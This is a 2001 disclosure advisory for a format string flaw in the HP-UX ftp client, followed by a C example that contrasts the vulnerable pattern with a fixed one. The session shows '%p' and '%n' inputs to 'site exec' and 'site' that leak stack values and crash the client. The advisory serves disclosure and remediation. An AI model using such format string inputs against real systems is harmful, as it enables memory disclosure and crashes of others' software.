
Title: HP/UX FTP format string vulnerability
Released by: zorgon
Date: 8th January 2001

A format string vulnerability exists in ftp. This vulnerability was discussed with HP labs.

$ uname -a
HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs
$ ftp localhost
Connected to localhost.
220 localhost FTP server (Version Wed Feb  9 08:03:34 GMT 2000) ready.
Name (localhost:zorgon):zorgon
331 Password required for zorgon.
230 User zorgon logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site exec %p %p %p %p
200-40008f10 00000003 00000002 00000001
200  (end of '40008f10 00000003 00000002 00000001')
ftp> site exec %n %n %n %n
Bus error(coredump)


The 'SITE' command is also vulnerable:


ftp> site %p %p %p %p
500 'SITE 40008F0C 00000002 00000002 00000001': command not understood.
ftp> site %n %n %n %n
Bus error(coredump)
$ file core
core:           fichier de vidage de la memoire de'ftp' - recu SIGBUS

The ftp client does not handle format string characters in the typed command correctly.

Once HP labs fixes the problem in the client, the result will be:

ftp>  site exec %n %n %n %n
--->  SITE exec %n %n %n %n
200-%n %n %n %n
200  (end of '%n %n %n %n')


So in this case the ftpd server will not process the format string characters.

The fix will be made in the next release of the ftp client.
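
The client-side pattern behind the behaviour above, next to the corrected form, as an added example that is not part of the original advisory and is not HP's code. The names command, send_line_vulnerable, send_line_fixed and count_conversions are hypothetical and the inputs are constructed; "%%" is used as the probe because it consumes no argument, so the difference shows without reading or writing memory.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical printf-style helper that builds the line sent on the
   control connection (an assumption; HP's client source is not shown). */
static int command(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* Vulnerable pattern: the line typed at "ftp>" is used as the format,
   so '%' sequences in it are interpreted instead of transmitted. */
int send_line_vulnerable(char *out, size_t n, const char *typed)
{
    return command(out, n, typed);
}

/* Fixed pattern: constant format, typed text is only ever data. */
int send_line_fixed(char *out, size_t n, const char *typed)
{
    return command(out, n, "%s", typed);
}

/* Review aid: count conversion specifiers in typed input
   ("%%" is a literal percent sign and is not counted). */
int count_conversions(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        if (s[1] != '\0') count++;
    }
    return count;
}

int main(void)
{
    char wire[128];
    send_line_vulnerable(wire, sizeof wire, "SITE exec 100%% done");
    printf("vulnerable sends: %s\n", wire);  /* one '%' was consumed */
    send_line_fixed(wire, sizeof wire, "SITE exec %n %n %n %n");
    printf("fixed sends:      %s\n", wire);  /* sent byte for byte */
    return 0;
}
```

With the fixed form the client transmits "SITE exec %n %n %n %n" unchanged, which matches the "--->" line in the expected post-fix session.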



